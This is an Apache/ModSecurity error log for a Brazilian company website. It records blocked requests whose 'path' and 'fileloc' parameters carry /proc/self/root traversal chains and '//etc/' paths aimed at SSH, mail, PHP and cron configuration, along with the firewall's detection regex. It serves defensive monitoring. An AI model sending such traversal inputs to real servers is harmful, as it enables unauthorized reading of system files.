[Tue Mar 17 16:37:07.150697 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:52214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtY_PqhzTj3BvfDX-XOQAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:07.967854 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:52214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtY_PqhzTj3BvfDX-XOgAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:11.922901 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:35300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtZ9a6ubjKNq_cu4YXxgAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:12.339975 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:35300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtaNa6ubjKNq_cu4YXxwAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:15.900649 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:35314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtaxj0p0SRWAqcjGGJOAAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:17.570965 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:41470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtbXIk7brgkOH-rIWbbAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:25.121824 2026] [proxy_fcgi:error] [pid 18380:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45970] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:37:38.829587 2026] [core:alert] [pid 19507:tid 140411683178240] [client 216.73.216.191:47634] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Tue Mar 17 16:37:48.045929 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46446] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:37:49.086920 2026] [:error] [pid 7004:tid 140411683178240] [client 74.7.243.128:47784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtjcU6Sx0TG1YjmQi-HwAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:37:54.406622 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:41486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtkta6ubjKNq_cu4YX3AAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:38:11.125809 2026] [proxy_fcgi:error] [pid 25836:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47064] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:38:18.789961 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:44450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtqvPqhzTj3BvfDX-XWwAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:38:20.572923 2026] [:error] [pid 18380:tid 140411741927168] [client 74.7.241.31:57758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtrK4xEDsg_V3ESNZa6wAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:38:22.617797 2026] [:error] [pid 2473:tid 140411590858496] [client 216.73.216.191:63596] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtrqBJNF7axNlVR0UoFwAAABI"]
[Tue Mar 17 16:38:33.530259 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:58968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtuda6ubjKNq_cu4YX_AAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:38:35.125825 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47550] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:38:57.126819 2026] [proxy_fcgi:error] [pid 6296:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:39:07.678751 2026] [:error] [pid 7437:tid 140411607643904] [client 216.73.216.191:36095] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt2geiSKl8TjouI-YndQAAA9A"]
[Tue Mar 17 16:39:09.343235 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.244.43:35916] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmt3dY0UrI5A3LftIwNBwAAAYk"]
[Tue Mar 17 16:39:17.710273 2026] [:error] [pid 25836:tid 140411649607424] [client 216.73.216.191:15949] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt5Yh-PF_25v4hFRB62QAAAQs"]
[Tue Mar 17 16:39:20.147364 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48268] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:39:22.675422 2026] [:error] [pid 18380:tid 140411699963648] [client 216.73.216.191:31275] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt6q4xEDsg_V3ESNZbEwAAAgU"]
[Tue Mar 17 16:39:28.557353 2026] [:error] [pid 2598:tid 140411582465792] [client 216.73.216.191:35735] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt8Bj0p0SRWAqcjGGJZQAAAxM"]
[Tue Mar 17 16:39:32.165016 2026] [:error] [pid 6296:tid 140411691570944] [client 216.73.216.191:59871] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt9HIk7brgkOH-rIWbwAAAAUY"]
[Tue Mar 17 16:39:35.608936 2026] [:error] [pid 19507:tid 140411658000128] [client 216.73.216.191:26507] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt99Y0UrI5A3LftIwNFwAAAYo"]
[Tue Mar 17 16:39:39.589036 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:57770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmt-3Ik7brgkOH-rIWbxgAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:39:40.100001 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.228.61:46756] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmt_Bj0p0SRWAqcjGGJaQAAAwA"]
[Tue Mar 17 16:39:43.050028 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48636] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:39:56.490359 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:46114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuDAeiSKl8TjouI-YniAAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:39:59.641837 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.31:47464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuD6BJNF7axNlVR0UoRAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
